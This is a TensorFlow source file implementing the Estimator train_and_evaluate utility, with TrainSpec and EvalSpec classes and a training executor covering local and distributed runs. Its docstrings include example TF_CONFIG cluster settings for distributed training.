Zwysilence/tensorflow
|
b55001be83da044bb21d539d433dec6231eaec55
|
[
"Apache-2.0"
] | 6
|
2018-12-20T01:35:20.000Z
|
2020-07-10T17:29:57.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes and functions related to train_and_evaluate."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import os
import time
import six
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.distribute import estimator_training as distribute_coordinator_training
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import exporter as exporter_lib
from tensorflow.python.estimator import run_config as run_config_lib
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import server_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import compat
from tensorflow.python.util.tf_export import estimator_export
_MAX_DELAY_SECS = 60
_DELAY_SECS_PER_WORKER = 5
_TF_CONFIG_ENV = 'TF_CONFIG'
_ENVIRONMENT_KEY = 'environment'
_ENVIRONMENT_GOOGLE_VALUE = 'google'
_TRAINER_JOBS = (run_config_lib.TaskType.CHIEF, run_config_lib.TaskType.MASTER,
run_config_lib.TaskType.WORKER)
def _validate_input_fn(input_fn):
"""Validates the `input_fn`."""
if not callable(input_fn):
raise TypeError('`input_fn` must be callable, given: {}'.format(input_fn))
def _validate_hooks(hooks):
"""Validates the `hooks`."""
hooks = tuple(hooks or [])
for hook in hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError(
'All hooks must be `SessionRunHook` instances, given: {}'.format(
hook))
return hooks
def _validate_exporters(exporters):
"""Validates `exporters` and returns them as a tuple."""
if not exporters:
return ()
if isinstance(exporters, exporter_lib.Exporter):
exporters = [exporters]
unique_names = [] # `Exporter`s should have unique names.
try:
for exporter in exporters:
if not isinstance(exporter, exporter_lib.Exporter):
# Error message will be printed out by the outer try/except.
raise TypeError
if not exporter.name:
full_list_of_names = [e.name for e in exporters]
raise ValueError('An Exporter cannot have a name that is `None` or'
' empty. All exporter names:'
' {}'.format(full_list_of_names))
if not isinstance(exporter.name, six.string_types):
raise ValueError('An Exporter must have a string name. Given: '
'{}'.format(type(exporter.name)))
if exporter.name in unique_names:
full_list_of_names = [e.name for e in exporters]
raise ValueError(
'`exporters` must have unique names. Such a name cannot be `None`.'
' All exporter names: {}'.format(full_list_of_names))
unique_names.append(exporter.name)
except TypeError:
# Two possibilities:
# - `exporters` is neither `Exporter` nor iterable. Python has
# raised a `TypeError` when iterating over `exporters`.
# - an `exporter` was None or not of type `Exporter`, so we raised a
# `TypeError`.
raise TypeError('`exporters` must be an Exporter,'
' an iterable of Exporter, or `None`,'
' found %s.' % exporters)
return tuple(exporters)
def _is_google_env():
"""Detects whether current environment is google."""
tf_config = json.loads(os.environ.get(_TF_CONFIG_ENV) or '{}')
if not tf_config:
logging.warn('TF_CONFIG should not be empty in distributed environment.')
return tf_config.get(_ENVIRONMENT_KEY) == _ENVIRONMENT_GOOGLE_VALUE
@estimator_export('estimator.TrainSpec')
class TrainSpec(
collections.namedtuple('TrainSpec', ['input_fn', 'max_steps', 'hooks'])):
"""Configuration for the "train" part for the `train_and_evaluate` call.
`TrainSpec` determines the input data for the training, as well as the
duration. Optional hooks run at various stages of training.
"""
def __new__(cls, input_fn, max_steps=None, hooks=None):
"""Creates a validated `TrainSpec` instance.
Args:
input_fn: A function that provides input data for training as minibatches.
See [Premade Estimators](https://tensorflow.org/guide/premade_estimators#create_input_functions)
for more information. The function should construct and return one of
the following:
* A 'tf.data.Dataset' object: Outputs of `Dataset` object must be a
tuple (features, labels) with same constraints as below.
* A tuple (features, labels): Where features is a `Tensor` or a
dictionary of string feature name to `Tensor` and labels is a
`Tensor` or a dictionary of string label name to `Tensor`.
max_steps: Int. Positive number of total steps for which to train model.
If `None`, train forever. The training `input_fn` is not expected to
generate `OutOfRangeError` or `StopIteration` exceptions. See the
`train_and_evaluate` stop condition section for details.
hooks: Iterable of `tf.train.SessionRunHook` objects to run
on all workers (including chief) during training.
Returns:
A validated `TrainSpec` object.
Raises:
ValueError: If any of the input arguments is invalid.
TypeError: If any of the arguments is not of the expected type.
"""
# Validate input_fn.
_validate_input_fn(input_fn)
# Validate max_steps.
if max_steps is not None and max_steps <= 0:
raise ValueError(
'Must specify max_steps > 0, given: {}'.format(max_steps))
# Validate hooks.
hooks = _validate_hooks(hooks)
return super(TrainSpec, cls).__new__(
cls, input_fn=input_fn, max_steps=max_steps, hooks=hooks)
@estimator_export('estimator.EvalSpec')
class EvalSpec(
collections.namedtuple('EvalSpec', [
'input_fn', 'steps', 'name', 'hooks', 'exporters', 'start_delay_secs',
'throttle_secs'
])):
"""Configuration for the "eval" part for the `train_and_evaluate` call.
`EvalSpec` combines details of evaluation of the trained model as well as its
export. Evaluation consists of computing metrics to judge the performance of
the trained model. Export writes out the trained model on to external
storage.
"""
def __new__(cls,
input_fn,
steps=100,
name=None,
hooks=None,
exporters=None,
start_delay_secs=120,
throttle_secs=600):
"""Creates a validated `EvalSpec` instance.
Args:
input_fn: A function that constructs the input data for evaluation.
See [Premade Estimators](https://tensorflow.org/api_guides/premade_estimators#create_input_functions)
for more information. The function should construct and return one of
the following:
* A 'tf.data.Dataset' object: Outputs of `Dataset` object must be a
tuple (features, labels) with same constraints as below.
* A tuple (features, labels): Where features is a `Tensor` or a
dictionary of string feature name to `Tensor` and labels is a
`Tensor` or a dictionary of string label name to `Tensor`.
steps: Int. Positive number of steps for which to evaluate model. If
`None`, evaluates until `input_fn` raises an end-of-input exception.
See `Estimator.evaluate` for details.
name: String. Name of the evaluation if user needs to run multiple
evaluations on different data sets. Metrics for different evaluations
are saved in separate folders, and appear separately in tensorboard.
hooks: Iterable of `tf.train.SessionRunHook` objects to run
during evaluation.
exporters: Iterable of `Exporter`s, or a single one, or `None`.
`exporters` will be invoked after each evaluation.
start_delay_secs: Int. Start evaluating after waiting for this many
seconds.
throttle_secs: Int. Do not re-evaluate unless the last evaluation was
started at least this many seconds ago. Of course, evaluation does not
occur if no new checkpoints are available, hence, this is the minimum.
Returns:
A validated `EvalSpec` object.
Raises:
ValueError: If any of the input arguments is invalid.
TypeError: If any of the arguments is not of the expected type.
"""
# Validate input_fn.
_validate_input_fn(input_fn)
# Validate steps.
if steps is not None and steps <= 0:
raise ValueError('Must specify steps > 0, given: {}'.format(steps))
# Validate name.
if name is not None and not isinstance(name, six.string_types):
raise TypeError('`name` must be string, given: {}'.format(name))
# Validate hooks.
hooks = _validate_hooks(hooks)
# Validate exporters.
exporters = _validate_exporters(exporters)
# Validate start_delay_secs.
if start_delay_secs < 0:
raise ValueError('Must specify start_delay_secs >= 0, given: {}'.format(
start_delay_secs))
# Validate throttle_secs.
if throttle_secs < 0:
raise ValueError(
'Must specify throttle_secs >= 0, given: {}'.format(throttle_secs))
return super(EvalSpec, cls).__new__(
cls,
input_fn=input_fn,
steps=steps,
name=name,
hooks=hooks,
exporters=exporters,
start_delay_secs=start_delay_secs,
throttle_secs=throttle_secs)
@estimator_export('estimator.train_and_evaluate')
def train_and_evaluate(estimator, train_spec, eval_spec):
"""Train and evaluate the `estimator`.
This utility function trains, evaluates, and (optionally) exports the model by
using the given `estimator`. All training related specification is held in
`train_spec`, including training `input_fn` and training max steps, etc. All
evaluation and export related specification is held in `eval_spec`, including
evaluation `input_fn`, steps, etc.
This utility function provides consistent behavior for both local
(non-distributed) and distributed configurations. The default distribution
configuration is parameter server-based between-graph replication. For other
types of distribution configurations such as all-reduce training, please use
[DistributionStrategies](https://github.com/tensorflow/tensorflow/tree/master/tensorflow/contrib/distribute). # pylint: disable=line-too-long
Overfitting: In order to avoid overfitting, it is recommended to set up the
training `input_fn` to shuffle the training data properly.
Stop condition: In order to support both distributed and non-distributed
configuration reliably, the only supported stop condition for model
training is `train_spec.max_steps`. If `train_spec.max_steps` is `None`, the
model is trained forever. *Use with care* if model stop condition is
different. For example, assume that the model is expected to be trained with
one epoch of training data, and the training `input_fn` is configured to throw
`OutOfRangeError` after going through one epoch, which stops the
`Estimator.train`. For a three-training-worker distributed configuration, each
training worker is likely to go through the whole epoch independently. So, the
model will be trained with three epochs of training data instead of one epoch.
Example of local (non-distributed) training:
```python
# Set up feature columns.
categorial_feature_a = categorial_column_with_hash_bucket(...)
categorial_feature_a_emb = embedding_column(
categorical_column=categorial_feature_a, ...)
... # other feature columns
estimator = DNNClassifier(
feature_columns=[categorial_feature_a_emb, ...],
hidden_units=[1024, 512, 256])
# Or set up the model directory
# estimator = DNNClassifier(
# config=tf.estimator.RunConfig(
# model_dir='/my_model', save_summary_steps=100),
# feature_columns=[categorial_feature_a_emb, ...],
# hidden_units=[1024, 512, 256])
# Input pipeline for train and evaluate.
def train_input_fn(): # returns x, y
# please shuffle the data.
pass
def eval_input_fn(): # returns x, y
pass
train_spec = tf.estimator.TrainSpec(input_fn=train_input_fn, max_steps=1000)
eval_spec = tf.estimator.EvalSpec(input_fn=eval_input_fn)
tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)
```
Note that in current implementation `estimator.evaluate` will be called
multiple times. This means that evaluation graph (including eval_input_fn)
will be re-created for each `evaluate` call. `estimator.train` will be called
only once.
Example of distributed training:
Regarding the example of distributed training, the code above can be used
without a change (Please do make sure that the `RunConfig.model_dir` for all
workers is set to the same directory, i.e., a shared file system all workers
can read and write). The only extra work to do is setting the environment
variable `TF_CONFIG` properly for each worker correspondingly.
Also see
[Distributed TensorFlow](https://www.tensorflow.org/deploy/distributed).
Setting environment variable depends on the platform. For example, on Linux,
it can be done as follows (`$` is the shell prompt):
```
$ TF_CONFIG='<replace_with_real_content>' python train_model.py
```
For the content in `TF_CONFIG`, assume that the training cluster spec looks
like:
```
cluster = {"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]}
```
Example of `TF_CONFIG` for chief training worker (must have one and only one):
```
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "chief", "index": 0}
}'
```
Note that the chief worker also does the model training job, similar to other
non-chief training workers (see next paragraph). In addition to the model
training, it manages some extra work, e.g., checkpoint saving and restoring,
writing summaries, etc.
Example of `TF_CONFIG` for non-chief training worker (optional, could be
multiple):
```
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "worker", "index": 0}
}'
```
where the `task.index` should be set as 0, 1, 2, in this example, respectively
for non-chief training workers.
Example of `TF_CONFIG` for parameter server, aka ps (could be multiple):
```
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "ps", "index": 0}
}'
```
where the `task.index` should be set as 0 and 1, in this example, respectively
for parameter servers.
Example of `TF_CONFIG` for evaluator task. Evaluator is a special task that is
not part of the training cluster. There could be only one. It is used for
model evaluation.
```
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "evaluator", "index": 0}
}'
```
When `distribute` or `experimental_distribute.train_distribute` and
`experimental_distribute.remote_cluster` is set, this method will start a
client running on the current host which connects to the `remote_cluster` for
training and evaluation.
Args:
estimator: An `Estimator` instance to train and evaluate.
train_spec: A `TrainSpec` instance to specify the training specification.
eval_spec: A `EvalSpec` instance to specify the evaluation and export
specification.
Returns:
A tuple of the result of the `evaluate` call to the `Estimator` and the
export results using the specified `ExportStrategy`.
Currently, the return value is undefined for distributed training mode.
Raises:
ValueError: if environment variable `TF_CONFIG` is incorrectly set.
"""
_assert_eval_spec(eval_spec) # fail fast if eval_spec is invalid.
executor = _TrainingExecutor(
estimator=estimator, train_spec=train_spec, eval_spec=eval_spec)
config = estimator.config
# If `distribute_coordinator_mode` is set and running in distributed
# environment, we run `train_and_evaluate` via distribute coordinator.
if distribute_coordinator_training.should_run_distribute_coordinator(config):
logging.info('Running `train_and_evaluate` with Distribute Coordinator.')
distribute_coordinator_training.train_and_evaluate(
estimator, train_spec, eval_spec, _TrainingExecutor)
return
if (config.task_type == run_config_lib.TaskType.EVALUATOR and
config.task_id > 0):
raise ValueError(
'For distributed training, there can only be one `evaluator` task '
'(with task id 0). Given task id {}'.format(config.task_id))
return executor.run()
class _StopAtSecsHook(session_run_hook.SessionRunHook):
"""Stops given secs after begin is called."""
def __init__(self, stop_after_secs):
self._stop_after_secs = stop_after_secs
self._start_time = None
def begin(self):
self._start_time = time.time()
def after_run(self, run_context, run_values):
del run_values
if time.time() - self._start_time >= self._stop_after_secs:
run_context.request_stop()
class _NewCheckpointListenerForEvaluate(
basic_session_run_hooks.CheckpointSaverListener):
"""A saver listener to run evaluate with every checkpoint."""
def __init__(self, evaluator, eval_throttle_secs, continuous_eval_listener):
self._evaluator = evaluator
self._eval_throttle_secs = eval_throttle_secs
self._continuous_eval_listener = continuous_eval_listener
self.eval_result, self.export_results = None, None
def begin(self):
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=self._eval_throttle_secs)
self._is_first_run = True
def after_save(self, session, global_step_value):
del session # unused; required by signature.
# skip first run model is not trained yet.
if self._is_first_run:
self._is_first_run = False
return
if not self._continuous_eval_listener.before_eval():
logging.info('Exiting training and evaluation loop, as requested by '
'_ContinuousEvalListener.before_eval.')
return True
if self._timer.should_trigger_for_step(global_step_value):
self._evaluate(global_step_value) # updates self.eval_result
if not self._continuous_eval_listener.after_eval(self.eval_result):
logging.info('Exiting evaluation, as requested by '
'_ContinuousEvalListener.after_eval.')
return True
else:
# TODO(ispir): add remaining time in the log.
logging.info('Skip the current checkpoint eval due to throttle secs '
'({} secs).'.format(self._eval_throttle_secs))
def end(self, session, global_step_value):
# Evaluate if the last step has not been evaluated, yet.
if global_step_value != self._timer.last_triggered_step():
if self._continuous_eval_listener.before_eval():
self._evaluate(global_step_value)
self._continuous_eval_listener.after_eval(self.eval_result)
def _evaluate(self, global_step_value):
self._timer.update_last_triggered_step(global_step_value)
self.eval_result, self.export_results = (
self._evaluator.evaluate_and_export())
if self.eval_result.status != _EvalStatus.EVALUATED:
# This is unexpected; should never happen.
# Training should always end with a new checkpoint.
raise RuntimeError('There was no new checkpoint after the training. '
'Eval status: {}'.format(self.eval_result.status))
class _TrainingExecutor(object):
"""The executor to run `Estimator` training and evaluation.
This implementation supports both distributed and non-distributed (aka local)
training and evaluation based on the setting in `tf.estimator.RunConfig`.
"""
def __init__(self,
estimator,
train_spec,
eval_spec,
train_hooks=None,
continuous_eval_listener=None):
if not isinstance(estimator, estimator_lib.Estimator):
raise TypeError(
'`estimator` must have type `tf.estimator.Estimator`. '
'Got: {}'.format(type(estimator)))
self._estimator = estimator
if not isinstance(train_spec, TrainSpec):
raise TypeError(
'`train_spec` must have type `tf.estimator.TrainSpec`. '
'Got: {}'.format(type(train_spec)))
self._train_spec = train_spec
if eval_spec and not isinstance(eval_spec, EvalSpec):
raise TypeError('`eval_spec` must be either `None` or have type '
'`tf.estimator.EvalSpec`. Got: {}'.format(
type(eval_spec)))
self._eval_spec = eval_spec
self._train_hooks = _validate_hooks(train_hooks)
if (continuous_eval_listener and
not isinstance(continuous_eval_listener, _ContinuousEvalListener)):
raise TypeError('`continuous_eval_listener` must have type '
'`_ContinuousEvalListener`.')
self._continuous_eval_listener = (
continuous_eval_listener or _ContinuousEvalListener())
@property
def estimator(self):
return self._estimator
def run(self):
"""Executes the run_foo for task type `foo`.
`_TrainingExecutor` predefines the procedure for task type 'chief',
'worker', 'ps', and 'evaluator'. For task type `foo`, the corresponding
procedure is `run_foo'. This `run` method invoke the procedure base on the
`RunConfig.task_type`.
Returns:
A tuple of the result of the `evaluate` call to the `Estimator` and the
export results using the specified `ExportStrategy`.
Currently undefined for distributed training mode.
Raises:
ValueError: if the estimator.config is mis-configured.
"""
config = self._estimator.config
if (not config.cluster_spec and
config.task_type != run_config_lib.TaskType.EVALUATOR):
logging.info('Running training and evaluation locally (non-distributed).')
return self.run_local()
# Distributed case.
if not config.task_type:
# TODO(xiejw): Improve the error message about how to set the TF_CONFIG
# correctly.
raise ValueError(
'`estimator.config` must have task_type set. This usually means '
'TF_CONFIG environment is not set correctly.')
if config.task_type == 'local':
raise ValueError(
'`task.type` in TF_CONFIG cannot be `local`. Leaving `cluster` and '
'`task` properties in TF_CONFIG absent triggers train and evaluate '
'`Estimator` locally (non-distributed).')
# For task type foo, call executor.run_foo.
available_tasks = [
x for x in dir(self)
if x.startswith('run_') and x != 'run_local' and
callable(getattr(self, x))
]
task_to_run = 'run_' + config.task_type
if task_to_run not in available_tasks:
raise ValueError(
'Task type {} is not supported. Supported task types are {}'.format(
config.task_type, [x[len('run_'):] for x in available_tasks]))
getattr(self, task_to_run)()
def run_chief(self):
"""Runs task chief."""
# TODO(xiejw): To allow execution framework to add train hooks.
return self._start_distributed_training()
def run_worker(self):
"""Runs task (training) worker."""
# TODO(xiejw): To allow execution framework to add train hooks.
return self._start_distributed_training()
def run_master(self):
"""Runs task master."""
_assert_eval_spec(self._eval_spec)
# Final export signal: For any eval result with global_step >= train
# max_steps, the evaluator will send the final export signal. There is a
# small chance that the Estimator.train stopping logic sees a different
# global_step value (due to global step race condition and the fact the
# saver sees a larger value for checkpoint saving), which does not end
# the training. When the training ends, a new checkpoint is generated, which
# triggers the listener again. So, it could be the case the final export is
# triggered twice.
#
# But here, throttle_secs will skip the next intermediate checkpoint and,
# so, the double final export chance is very small.
evaluator = _TrainingExecutor._Evaluator(self._estimator, self._eval_spec,
self._train_spec.max_steps)
# When the underlying `Estimator` object saves a new checkpoint, we would
# like this callback to be called so that evaluation and export can trigger.
saving_listeners = [
_NewCheckpointListenerForEvaluate(evaluator,
self._eval_spec.throttle_secs,
_ContinuousEvalListener())
]
self._start_distributed_training(saving_listeners=saving_listeners)
def run_evaluator(self):
"""Runs task evaluator."""
# TODO(xiejw): To allow execution framework to add continuous eval listener.
return self._start_continuous_evaluation()
def run_ps(self):
"""Runs task parameter server (in training cluster spec)."""
config = self._estimator.config
server = self._start_std_server(config)
server.join()
def run_local(self):
"""Runs training and evaluation locally (non-distributed)."""
_assert_eval_spec(self._eval_spec)
train_hooks = list(self._train_spec.hooks) + list(self._train_hooks)
logging.info('Start train and evaluate loop. The evaluate will happen '
'after every checkpoint. Checkpoint frequency is determined '
'based on RunConfig arguments: save_checkpoints_steps {} or '
'save_checkpoints_secs {}.'.format(
self._estimator.config.save_checkpoints_steps,
self._estimator.config.save_checkpoints_secs))
evaluator = _TrainingExecutor._Evaluator(self._estimator, self._eval_spec,
self._train_spec.max_steps)
listener_for_eval = _NewCheckpointListenerForEvaluate(
evaluator, self._eval_spec.throttle_secs,
self._continuous_eval_listener)
saving_listeners = [listener_for_eval]
self._estimator.train(
input_fn=self._train_spec.input_fn,
max_steps=self._train_spec.max_steps,
hooks=train_hooks,
saving_listeners=saving_listeners)
eval_result = listener_for_eval.eval_result or _EvalResult(
status=_EvalStatus.MISSING_CHECKPOINT)
return eval_result.metrics, listener_for_eval.export_results
def _start_std_server(self, config):
"""Creates, starts, and returns a server_lib.Server."""
if (not config.cluster_spec or not config.task_type or
config.task_id is None):
raise RuntimeError('Could not start server; be sure to specify '
'cluster_spec, task_type, and task in '
'RunConfig or set the TF_CONFIG environment variable.')
if not config.master:
jobs = config.cluster_spec.jobs
if (len(jobs) == 1 and
len(config.cluster_spec.job_tasks(jobs[0])) == 1 and
config.task_type in _TRAINER_JOBS):
# For distributed training, config.master is empty if and only if it has
# a single node in the cluster spec. In this case, we should not start
# the server.
logging.info('Skip starting Tensorflow server as there is only one '
'node in the cluster.')
return
else:
raise RuntimeError(
'Could not start server; be sure to specify master in '
'RunConfig or set the TF_CONFIG environment variable.')
logging.info('Start Tensorflow server.')
if config.session_config is None:
session_config = config_pb2.ConfigProto(log_device_placement=False)
else:
session_config = config_pb2.ConfigProto(
log_device_placement=False,
gpu_options=config.session_config.gpu_options)
server = server_lib.Server(
config.cluster_spec,
job_name=config.task_type,
task_index=config.task_id,
config=session_config,
start=False,
protocol=config.protocol)
server.start()
return server
def _start_distributed_training(self, saving_listeners=None):
"""Calls `Estimator` train in a distributed setting."""
config = self._estimator.config
# Start in-process TensorFlow server if needed. It's important to start the
# server before we (optionally) sleep. Otherwise, the servers will wait to
# connect to each other before starting to train.
if not _is_google_env():
self._start_std_server(config)
# Delay worker to start. For asynchronous training, this usually helps model
# to converge faster. Chief starts the training immediately, so, worker
# with task id x (0-based) should wait (x+1) * _DELAY_SECS_PER_WORKER.
start_delay_secs = 0
if config.task_type == run_config_lib.TaskType.WORKER:
# TODO(xiejw): Replace the hard code logic (task_id + 1) with unique id in
# training cluster.
start_delay_secs = min(_MAX_DELAY_SECS,
(config.task_id + 1) * _DELAY_SECS_PER_WORKER)
if start_delay_secs > 0:
logging.info('Waiting %d secs before starting training.',
start_delay_secs)
time.sleep(start_delay_secs)
self._estimator.train(
input_fn=self._train_spec.input_fn,
max_steps=self._train_spec.max_steps,
hooks=list(self._train_spec.hooks) + list(self._train_hooks),
saving_listeners=saving_listeners)
def _start_continuous_evaluation(self):
"""Repeatedly calls `Estimator` evaluate and export until training ends."""
_assert_eval_spec(self._eval_spec)
start_delay_secs = self._eval_spec.start_delay_secs
if start_delay_secs:
logging.info('Waiting %f secs before starting eval.', start_delay_secs)
time.sleep(start_delay_secs)
latest_eval_result = None
evaluator = _TrainingExecutor._Evaluator(self._estimator, self._eval_spec,
self._train_spec.max_steps)
should_early_stop = False
while not should_early_stop:
if (latest_eval_result and
latest_eval_result.status == _EvalStatus.EVALUATED):
global_step = latest_eval_result.metrics.get(ops.GraphKeys.GLOBAL_STEP)
if (global_step and self._train_spec.max_steps and
global_step >= self._train_spec.max_steps):
logging.info(
'Exiting evaluation, global_step=%s >= train max_steps=%s',
global_step, self._train_spec.max_steps)
return
latest_eval_result, should_early_stop = self._execute_evaluator_once(
evaluator, self._continuous_eval_listener,
self._eval_spec.throttle_secs)
def _execute_evaluator_once(self, evaluator, continuous_eval_listener,
throttle_secs):
"""Executes the `evaluator`."""
_assert_eval_spec(self._eval_spec)
start = time.time()
eval_result = None
should_early_stop = False
if not continuous_eval_listener.before_eval():
logging.info('Exiting evaluation, as requested by '
'_ContinuousEvalListener.before_eval.')
should_early_stop = True
return (eval_result, should_early_stop)
# Final export signal: For any eval result with global_step >= train
# max_steps, the evaluator will send the final export signal. The next
# iteration of while loop will end the continuous eval as the stopping
# condition is satisfied (both checks use the same global_step value,
# i.e., no race condition)
eval_result, _ = evaluator.evaluate_and_export()
if not self._continuous_eval_listener.after_eval(eval_result):
logging.info('Exiting evaluation, as requested by '
'_ContinuousEvalListener.after_eval.')
should_early_stop = True
return (eval_result, should_early_stop)
# Throttle if necessary.
elapsed_time = time.time() - start
difference = throttle_secs - elapsed_time
if difference > 0:
logging.info('Waiting %f secs before starting next eval run.', difference)
time.sleep(difference)
elif (throttle_secs == 0 and
eval_result.status != _EvalStatus.EVALUATED):
# Prints a user-actionable warning to avoid unnecessary load on evaluator.
logging.warning(
'EvalSpec.throttle_secs is set as 0. This might overload the job '
'before finding (next) new checkpoint. Please consider to increase '
'it.')
return (eval_result, should_early_stop)
class _Evaluator(object):
"""A helper class to call `Estimator.evaluate` and export model."""
def __init__(self, estimator, eval_spec, max_training_steps):
self._estimator = estimator
_assert_eval_spec(eval_spec)
self._eval_spec = eval_spec
self._is_final_export_triggered = False
self._previous_ckpt_path = None
self._last_warning_time = 0
self._max_training_steps = max_training_steps
@property
def is_final_export_triggered(self):
return self._is_final_export_triggered
def evaluate_and_export(self):
"""Evaluate and (maybe) export the current model.
Returns:
A tuple of `EvalResult` instance and the export results.
Raises:
RuntimeError: for any unexpected internal error.
TypeError: if evaluation result has wrong type.
"""
latest_ckpt_path = self._estimator.latest_checkpoint()
if not latest_ckpt_path:
self._log_err_msg('Estimator is not trained yet. Will start an '
'evaluation when a checkpoint is ready.')
return _EvalResult(status=_EvalStatus.MISSING_CHECKPOINT), []
if latest_ckpt_path == self._previous_ckpt_path:
self._log_err_msg(
'No new checkpoint ready for evaluation. Skip the current '
'evaluation pass as evaluation results are expected to be same '
'for the same checkpoint.')
return _EvalResult(status=_EvalStatus.NO_NEW_CHECKPOINT), []
metrics = self._estimator.evaluate(
input_fn=self._eval_spec.input_fn,
steps=self._eval_spec.steps,
name=self._eval_spec.name,
checkpoint_path=latest_ckpt_path,
hooks=self._eval_spec.hooks)
# _EvalResult validates the metrics.
eval_result = _EvalResult(
status=_EvalStatus.EVALUATED,
metrics=metrics,
checkpoint_path=latest_ckpt_path)
is_the_final_export = (
eval_result.metrics[ops.GraphKeys.GLOBAL_STEP] >=
self._max_training_steps if self._max_training_steps else False)
export_results = self._export_eval_result(eval_result,
is_the_final_export)
if is_the_final_export:
logging.debug('Calling exporter with the `is_the_final_export=True`.')
self._is_final_export_triggered = True
self._last_warning_time = 0
self._previous_ckpt_path = latest_ckpt_path
return eval_result, export_results
def _log_err_msg(self, message):
"""Prints warning `message` every 10 mins."""
current_time = time.time()
if current_time - self._last_warning_time > 600:
logging.warning(message)
self._last_warning_time = current_time
def _export_eval_result(self, eval_result, is_the_final_export):
"""Export `eval_result` according to exporters in `EvalSpec`."""
export_dir_base = os.path.join(
compat.as_str_any(self._estimator.model_dir),
compat.as_str_any('export'))
export_results = []
for exporter in self._eval_spec.exporters:
export_results.append(
exporter.export(
estimator=self._estimator,
export_path=os.path.join(
compat.as_str_any(export_dir_base),
compat.as_str_any(exporter.name)),
checkpoint_path=eval_result.checkpoint_path,
eval_result=eval_result.metrics,
is_the_final_export=is_the_final_export))
return export_results
class _EvalStatus(object):
"""The status of an evaluation event.
For local training and evaluation, the status can only be `EVALUATED` as
`Estimator.train` always generates a new checkpoint.
For distributed training and evaluation, a separated evaluator keeps looking
for new checkpoint. So, multiple situations might occur:
- EVALUATED: A new checkpoint is found since last evaluation.
`Estimator.evaluate` will be invoked.
- MISSING_CHECKPOINT: No checkpoint can be found. Typically, this means
the trainer has not yet produced any checkpoint.
- NO_NEW_CHECKPOINT: No new checkpoint can be found since last evaluation.
Typically, this means the trainer has not yet produced any new checkpoint.
"""
EVALUATED = 'evaluated'
MISSING_CHECKPOINT = 'missing checkpoint'
NO_NEW_CHECKPOINT = 'no new checkpoint'
class _EvalResult(
collections.namedtuple('EvalResult',
['status', 'metrics', 'checkpoint_path'])):
"""_EvalResult holds the result of an evaluation event."""
def __new__(cls, status, metrics=None, checkpoint_path=None):
"""Creates a validated `_EvalResult`.
Args:
status: See `_EvalStatus`.
metrics: The evaluation results returned by `Estimator.evaluate`. Only set
if status is `EVALUATED`.
checkpoint_path: The corresponding checkpoint path for the `metrics`. Only
set if status is `EVALUATED`.
Returns:
A validated `_EvalResult` object.
Raises:
ValueError: If validation fails.
TypeError: If any of the arguments is not the expected type.
"""
if status != _EvalStatus.EVALUATED:
if metrics:
raise ValueError(
'metrics must be `None` if status is not {}; got status {},'
' metrics {}'.format(_EvalStatus.EVALUATED, status, metrics))
if checkpoint_path:
raise ValueError(
'checkpoint must be `None` if status is not {}; got status {}, '
'checkpoint_path {}'.format(_EvalStatus.EVALUATED, status,
checkpoint_path))
return super(_EvalResult, cls).__new__(cls, status, metrics,
checkpoint_path)
# Now, evaluated case.
assert status == _EvalStatus.EVALUATED
# Validates metrics.
if not metrics:
raise ValueError(
'Internal error: `Estimator.evaluate` should never return empty '
'metrics.')
if not isinstance(metrics, dict):
raise TypeError(
'`Estimator.evaluate` should return dict. Given {}.'.format(
type(metrics)))
if ops.GraphKeys.GLOBAL_STEP not in metrics:
raise ValueError(
'Internal error: `Estimator.evaluate` result should have '
'`global_step` in result. Given {}'.format(metrics))
# Validates checkpoint_path.
if not checkpoint_path:
raise ValueError(
'Internal error: `checkpoint_path` should never be empty.')
return super(_EvalResult, cls).__new__(cls, status, metrics,
checkpoint_path)
class _ContinuousEvalListener(object):
"""Interface for listeners that take action before or after evaluation."""
def before_eval(self):
"""Called before evaluation.
Returns:
`False` if you want to skip the current evaluation and early stop the
continuous evaluation; `True` otherwise.
"""
return True
def after_eval(self, eval_result):
"""Called after the evaluation is executed.
Args:
eval_result: An `_EvalResult` instance.
Returns:
False if you want to early stop continuous evaluation; `True` otherwise.
"""
del eval_result
return True
def _assert_eval_spec(eval_spec):
"""Raise error if `eval_spec` is not of the right type."""
if not isinstance(eval_spec, EvalSpec):
raise TypeError('`eval_spec` must have type `tf.estimator.EvalSpec`. '
'Got: {}'.format(type(eval_spec)))
| 39.179702
| 144
| 0.686447
|
b4059bf717f5a5b7b5a23c6e3b2f5b6cfe641fdd
| 2,968
|
py
|
Python
|
lidardet/datasets/base.py
|
Jiaolong/trajectory-prediction
|
